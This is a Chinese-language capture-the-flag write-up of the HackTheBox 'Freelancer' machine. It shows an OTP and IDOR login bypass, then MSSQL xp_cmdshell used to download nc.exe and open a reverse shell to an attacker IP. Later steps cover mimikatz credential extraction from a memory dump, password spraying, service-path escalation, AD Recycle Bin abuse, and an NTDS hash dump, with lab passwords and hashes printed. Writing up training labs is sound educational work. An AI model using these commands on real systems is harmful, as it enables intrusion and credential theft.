Freelancer - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Freelancer
• 10.10.11.5

端口扫描

80和一些常规windows端口：

$ nmap -sC -sV 10.10.11.5
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-03 14:06 CST
Nmap scan report for freelancer.htb (10.10.11.5)
Host is up (0.14s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          nginx 1.25.5
|_http-title: Freelancer - Job Board & Hiring platform
|_http-server-header: nginx/1.25.5
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4h53m58s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-06-03T11:02:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.22 seconds

80

需要加hosts：

10.10.11.5 freelancer.htb

一个就活相关网站：

目录扫描

目录扫描可以发现admin

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://freelancer.htb/ --exclude-length 197

/about                (Status: 301) [Size: 0] [--> /about/]
/admin                (Status: 301) [Size: 0] [--> /admin/]
/contact              (Status: 301) [Size: 0] [--> /contact/]

Employer

页面上有两个注册入口，但Employer注册后是默认未激活状态：

recovery

这里是处理逻辑上的错误，未激活的账号虽然不能登录，但可以选择忘记密码，输入注册时的安全问题答案后设置新密码，这时候账户被自动激活，可以正常登录：

OTP QR-CODE

然后可以发现一个使用qr-code登录的功能：

分析qrcode内容，是这样的链接,中间一段base64看起来是用户id，后面是otp的md5：

http://freelancer.htb/accounts/login/otp/MTAwMTM=/0268a3f41547b64009d5264a068b395c/

echo MTAwMTM= | base64 -d
10013

job

employer可以发布工作，测试发布，然后查看job信息可以看到employer信息查看接口，使用用户id：

users

这个接口存在idor，枚举可以发现admin的id为2，以及其他一些用户：

admin
tomHazard
martin1234
crista.W
Camellia19970
lisa.Ar
SaraArkhader
maya001
ItachiUchiha
Philippos
Jonathon.R
JohntheCarter
Markos

admin

这里又是一个逻辑问题，OTP代码没和用户id绑定，直接修改中间用户id部分，访问到admin用户：

http://freelancer.htb/accounts/login/otp/Mg==/239e3746d021264f38bdd160f52a419c/

现在我们可以访问admin，是django管理后台：

SQL Terminal

可以看到有一个SQL Terminal可以直接执行sql：

后面就是sql一步步枚举模拟,然后xp_cmdshell：

• 1433 - Pentesting MSSQL - Microsoft SQL Server | HackTricks | HackTricks
  https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#execute-os-commands

SELECT SYSTEM_USER;
Freelancer_webapp_user

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
sa；

EXECUTE AS LOGIN = 'sa';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell whoami;

sql_svc

然后就是执行命令获取shell，有杀软，简单的nc获取shell：

powershell -exec bypass -c 'wget http://10.10.14.10:7777/nc.exe -O C:\windows\Tasks\nc.exe'
EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell 'powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBjACAAJwB3AGcAZQB0ACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAxADAAOgA3ADcANwA3AC8AbgBjAC4AZQB4AGUAIAAtAE8AIABDADoAXAB3AGkAbgBkAG8AdwBzAFwAVABhAHMAawBzAFwAbgBjAC4AZQB4AGUAJwA=';

EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell 'C:\windows\Tasks\nc.exe -e powershell.exe 10.10.14.10 4444';

信息

然后在sql_svc的download目录中mssql相关目录，一个配置文件中得到一些密码：

SQLSVCPASSWORD="IL0v3ErenY3ager"
SAPWD="t3mp0r@ryS@PWD"

mikasaAckerman & user flag

简单尝试可以发现mikasaAckerman用户复用了其中一个密码：

.\RunasCs.exe mikasaAckerman IL0v3ErenY3ager -r 10.10.14.37:4444 powershell

MEMORY.7z

mikasaAckerman桌面有个7z文件，根据邮件和7z文件名可以知道这是内存dump，那就下载到本地分析：

~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/smbserver.py -smb2support miao .  -username miao -password miao

net use v: \\10.10.14.37\miao miao /u:miao

copy MEMORY.7z v:\

解压之后就是内存dump，标准的volatility+mimikatz，或者windbg+mimikatz：

• volatilityfoundation/volatility: An advanced memory forensics framework
  https://github.com/volatilityfoundation/volatility
• Extracting passwords from hiberfil.sys and memory dumps – Diverto – Information Security Warriors
  https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps

.load C:\mimikatz_trunk\x64\mimilib.dll

!process 0 0 lsass.exe
ffffbc83a93e7080
.process /r /p ffffbc83a93e7080
!mimikatz

windbg+mimikatz有点问题，显示的不全，可以用MemProcFS加插件：

• ufrisk/MemProcFS: MemProcFS
  https://github.com/ufrisk/MemProcFS
• ufrisk/MemProcFS-plugins
  https://github.com/ufrisk/MemProcFS-plugins

.\MemProcFS.exe -device ..\MEMORY.DMP

dumps

从内存dump中提取出一些信息：

Administrator acb3617b6b9da5dc7778092bdea6f3b8 v3ryS0l!dP@sswd#29
liza.kazanof 6bc05d2a5ebf34f5b563ff233199dc5a
# 解出来是 RockYou!

PWN3D#l0rr@Armessa19

jmartinez path

根据内存中得到的密码规则，生成密码字典，枚举，发现jmartinez的密码,从这个用户开始有几种不同方式：

v3ryS0l!dP@sswd#29

for i in $(seq 1 100); do echo 'v3ryS0l!dP@sswd#'$i; done > passwords.txt

NetExec smb freelancer.htb -u users.txt -p passwords.txt

v3ryS0l!dP@sswd#35

jmartinez在Account Operators组，可以直接操作其他账号

另外还有一种服务提权方式：

sc.exe stop VMTools
sc.exe config VMTools binpath="cmd /c net localgroup administrators jmartinez /add"
sc.exe start VMTools

lorra199 path

另一个密码包含lorra199的变形，就是他的密码。登录lorra199：

evil-winrm -u lorra199 -p 'PWN3D#l0rr@Armessa199' -i freelancer.htb

AD Recycle Bin

lorra199在AD Recycle Bin组中，很早之前的Cascade也出现过这部分：

• Active Directory Object Recovery using the Recycle Bin
  https://blog.netwrix.com/2021/11/30/active-directory-object-recovery-recycle-bin/
• Restore-ADObject (ActiveDirectory) | Microsoft Learn
  https://learn.microsoft.com/en-us/powershell/module/activedirectory/restore-adobject?view=windowsserver2022-ps

可以成功恢复liza.kazanof，然后使用前面内存中得到的密码切换过去：

Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects

Restore-ADObject -Identity "ebe15df5-e265-45ec-b7fc-359877217138" -NewName "Liza Kazanof2" -TargetPath "CN=Users,DC=freelancer,DC=htb"

.\RunasCs.exe liza.kazanof RockYou! -r 10.10.14.37:4444 powershell

liza.kazanof

liza.kazanof有SeBackupPrivilege权限，直接卷影备份ntds和system然后dump即可：

• k4sth4/SeBackupPrivilege: Windows Privilege Escalation
  https://github.com/k4sth4/SeBackupPrivilege

就按照里面的步骤备份ntds和system，然后下载到本地dump：

root flag

得到的Administrator hash登录：

evil-winrm -u Administrator -H 0039318f1e8274633445bce32ad1a290 -i freelancer.htb

hashdump

~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py -ntds ntds.dit -system system  LOCAL

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d238e0bfa17d575038efc070187a91c2:::
freelancer.htb\mikasaAckerman:1105:aad3b435b51404eeaad3b435b51404ee:e8d62c7d57e5d74267ab6feb2f662674:::
sshd:1108:aad3b435b51404eeaad3b435b51404ee:c1e83616271e8e17d69391bdcd335ab4:::
SQLBackupOperator:1112:aad3b435b51404eeaad3b435b51404ee:c4b746db703d1af5575b5c3d69f57bab:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
DATACENTER-2019$:1115:aad3b435b51404eeaad3b435b51404ee:7a8b0efef4571ec55cc0b9f8cb73fdcf:::
lorra199:1116:aad3b435b51404eeaad3b435b51404ee:67d4ae78a155aab3d4aa602da518c051:::
freelancer.htb\maya.artmes:1124:aad3b435b51404eeaad3b435b51404ee:22db50a324b9a34ea898a290c1284e25:::
freelancer.htb\michael.williams:1126:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
freelancer.htb\sdavis:1127:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\d.jones:1128:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jen.brown:1129:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\taylor:1130:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jmartinez:1131:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\olivia.garcia:1133:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\dthomas:1134:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\sophia.h:1135:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\Ethan.l:1138:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\wwalker:1141:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jgreen:1142:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\evelyn.adams:1143:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\hking:1144:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\alex.hill:1145:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\samuel.turner:1146:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\ereed:1149:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\leon.sk:1151:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::

参考资料

• 1433 - Pentesting MSSQL - Microsoft SQL Server | HackTricks | HackTricks
  https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#execute-os-commands
• volatilityfoundation/volatility: An advanced memory forensics framework
  https://github.com/volatilityfoundation/volatility
• Extracting passwords from hiberfil.sys and memory dumps – Diverto – Information Security Warriors
  https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps
• ufrisk/MemProcFS: MemProcFS
  https://github.com/ufrisk/MemProcFS
• ufrisk/MemProcFS-plugins
  https://github.com/ufrisk/MemProcFS-plugins
• Active Directory Object Recovery using the Recycle Bin
  https://blog.netwrix.com/2021/11/30/active-directory-object-recovery-recycle-bin/
• Restore-ADObject (ActiveDirectory) | Microsoft Learn
  https://learn.microsoft.com/en-us/powershell/module/activedirectory/restore-adobject?view=windowsserver2022-ps
• k4sth4/SeBackupPrivilege: Windows Privilege Escalation
  https://github.com/k4sth4/SeBackupPrivilege